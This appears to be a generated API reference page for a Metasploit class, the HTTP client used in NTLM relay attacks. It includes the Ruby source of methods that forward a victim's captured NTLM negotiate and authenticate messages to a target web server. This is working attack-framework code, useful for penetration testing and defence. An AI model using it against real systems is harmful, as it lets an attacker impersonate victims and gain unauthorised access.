Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Inherits:
Object
  • Object
show all
Extended by:
Forwardable
Defined in:
lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb

Overview

The HTTP Client for interacting with the relayed_target

Instance Attribute Summary collapse

Class Method Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(provider: nil, target: nil, logger: nil, timeout: -1)) ⇒ Client

Returns a new instance of Client.

[View source] [View on GitHub]

11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 11

def initialize(provider: nil, target: nil, logger: nil, timeout: -1)
  @logger = logger
  @provider = provider
  @target = target
  @timeout = timeout
  http_logger_subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: logger)

  @client = Rex::Proto::Http::Client.new(
    target.ip,
    target.port,
    provider.dispatcher.tcp_socket.context,
    target.protocol == :https,
    subscriber: http_logger_subscriber
  )
end

Instance Attribute Details

#loggerObject (readonly, protected)

Returns the value of attribute logger.

[View on GitHub]

102
103
104
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 102

def logger
  @logger
end

#targetObject (readonly)

Returns the value of attribute target.

[View on GitHub]

9
10
11
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 9

def target
  @target
end

#timeoutObject

Returns the value of attribute timeout.

[View on GitHub]

8
9
10
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 8

def timeout
  @timeout
end

Class Method Details

.create(provider, target, logger, timeout) ⇒ Object

[View source] [View on GitHub]

27
28
29
30
31
32
33
34
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 27

def self.create(provider, target, logger, timeout)
  new(
    provider: provider,
    target: target,
    logger: logger,
    timeout: timeout
  )
end

Instance Method Details

#disconnect!Object

[View source] [View on GitHub]

36
37
38
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 36

def disconnect!
  @client.close
end

#relay_ntlmssp_type1(client_type1_msg) ⇒ Object

Parameters:

  • client_type1_msg (String)
[View source] [View on GitHub]

42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 42

def relay_ntlmssp_type1(client_type1_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type1_msg)
    }
  )

  res = @client.send_recv(req, @timeout, true)

  if res.nil?
    msg = "Unable to retrieve server challenge from #{target} (no HTTP response received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  unless res.code == 401
    msg = "Unable to retrieve server challenge from #{target} (HTTP status #{res.code} received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.decode64(res.headers['WWW-Authenticate'].split[1]),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end

#relay_ntlmssp_type3(client_type3_msg) ⇒ Object

Parameters:

  • client_type3_msg (String)
[View source] [View on GitHub]

76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 76

def relay_ntlmssp_type3(client_type3_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type3_msg)
    }
  )
  res = @client.send_recv(req, @timeout, true)

  if res.code.between?(200, 299)
    nt_status = WindowsError::NTStatus::STATUS_SUCCESS
  else
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  end
  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end

#send_recv(req, t = -1,, persist = true) ⇒ Object

[View source] [View on GitHub]

95
96
97
98
 
# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 95

def send_recv(req, t = -1, persist = true)
  # enable persistence by default to keep the connection open
  @client.send_recv(req, t, persist)
end